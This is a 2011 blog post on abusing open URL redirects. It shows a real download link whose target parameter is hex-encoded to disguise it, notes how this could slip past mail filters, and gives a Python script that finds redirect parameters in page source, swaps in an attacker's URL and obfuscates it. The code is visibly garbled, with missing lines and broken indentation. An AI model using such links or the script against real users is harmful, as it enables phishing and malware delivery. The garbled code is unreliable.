Sunday, 27 March 2011

The power of redirection

URL redirects are becoming less frequent but they are not going to disappear any time soon. You may not think it’s a big deal, but I’m guessing that the majority of people would not know the difference between clicking on<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&

And clicking on<ype=dl_dlnow&pid=11355671&mfgId=50119&merId=50119&pguid=V95vrAoOYJAAABI7QlIAAABo&ttag=tdw_dltext;&destUrl=%68%74%74%70%3a%2f%2f%77%77%77%2e%6c%61%76%61%6d%75%6e%6b%79%2e%63%6f%6d

It’s surprising that spammers have not considered this method. If a mail server checks the content of emails for links of black listed websites, a redirection could get around this, especially if obfuscated in such a way as above.

This is a hacker’s dream. People go onto a legitimate website that they’ve used hundreds of times before, they click on a link for, say Windows 7 SP1 (as is the one above), and a link that should take them to the Microsoft website instead takes them to a malicious website that contains malware that uses vulnerabilities fixed with SP1 (unlike the one above, promise ;) ).

Especially in recent times, with such huge catastrophes happening around the world, people are a bit wary, and want to give money. This is a huge opportunity for attackers, and as such large websites, especially those that are foundations taking people’s donations need to make sure that there aren’t redirects on their websites.

To show the ease of taking a normal page, finding redirects and exploiting them I have written this tool in Python:

(Note: This tool is for education purposes only. The author does not take any responsibility for any damage caused and does not condone this being used for illegal purposes.)

from sys import exit, argv
import re
from optparse import OptionParser
defaultUsage = 'usage: %prog '
parser = OptionParser(usage=defaultUsage)
parser.add_option('-f', '--file', action="store", type="string", dest="file", help="File for searching for redirects")
parser.add_option('-u', '--url', action="store", type="string", dest="url", help="A URL to replace the redirect, e.g.")
parser.add_option('-o', '--obfuscate', action="store_true", dest="obfuscate", help="Obfuscate a URL by converting to hex then URL encode. Note: -u option also needed.\nE.g. becomes \nhttp%3A%2F%2F%77%77%77%2E%6C%61%76%61%6D%75%6E%6B%79%2E%63%6F%6D%2F")
(options, args) = parser.parse_args()

separator = '---------------------------------------------------------------------------\n\n'

if not (options.file):
  print defaultUsage

filename = options.file
file = open(filename, 'r')
text =

urlPattern = 'http((\:\/\/)|(\%3A\%2F\%2F))\w*[.\w]+[\/\?+\=+\&+\%+\.+\;+\-+\_+\++\w+]*\"'
redir = 'http((\:\/\/)|(\%3A\%2F\%2F))\S*redir\S*\='+urlPattern #won't match all redirects but is good enough for my needs
match = re.findall(r'('+redir+')', text)
if not match:
  print "No redirects found!"
uniqueMatch = []
for elem in match:
  if elem not in uniqueMatch:

if options.obfuscate:
  if not options.url:
    print "A url is needed with -u in order to obfuscate"

if (options.url):
  url = options.url
  if url[:4]!='http':
    url = 'http://'+url
  if options.obfuscate: #convert to hex then effectively url encode, so A becomes %41 etc
    url = url.encode('hex')
    tempList = list(url)
    i = 0
     j = len(tempList)
     while (i < j):        tempList.insert(i, '%')        i+=3        j = len(tempList)      url = ''.join(tempList)    for elem in uniqueMatch:      original = elem[0] + '\n\nbecomes:\n\n'      print original      replaced = re.sub(r'\='+urlPattern, '='+url, elem[0]) #replace the strings
     print replaced+'\n\n'
     print separator #just presents it in a easy to read way
   for elem in uniqueMatch:
     print elem[0] + '\n'

redirects = len(uniqueMatch)
if redirects!=0:
   print str(redirects) + ' redirects found\n' #tells you how many found for good measure

I originally wanted to create a proxy server, which would then find all the redirects as a surfed the Internet, however I wanted something I could create in a couple of hours.
This program takes in a file such as the source code from a webpage with the -f option and prints out the redirects. If you specify -u you can specify a URL you want changed into the redirect, and -o to then obfuscate this.

To test this out you can use the source from the web page:

As you can see from the URL, this came from searching for windows 7 sp1 on cnet’s website, and the redirect at the top of the page came from this page.

There seems to be quite a few redirects which require the user to login first but this doesn’t fix the problem, since if it is a targeted attack, they will use a website that the target probably has a login for.

Either way redirects can be very dangerous, and shouldn’t be a problem that gets put off.

No comments:

Post a Comment